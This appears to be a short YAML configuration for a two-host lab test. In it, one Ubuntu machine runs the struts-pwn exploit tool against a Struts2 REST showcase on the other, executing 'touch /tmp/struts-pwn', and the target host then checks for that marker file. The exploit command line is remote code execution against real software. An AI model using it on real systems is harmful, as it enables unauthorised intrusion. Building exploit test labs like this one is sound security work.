blueprint: ubuntu2204-ubuntu2204
ubuntu2:
  playbook: ubuntu2.yml
  command: "python3 /opt/struts-pwn/struts-pwn.py --url 'http://ubuntu1:8080/struts2-rest-showcase/orders/3' -c 'touch /tmp/struts-pwn' --exploit"
ubuntu1:
  playbook: ubuntu1.yml
  command: "ls /tmp/struts-pwn"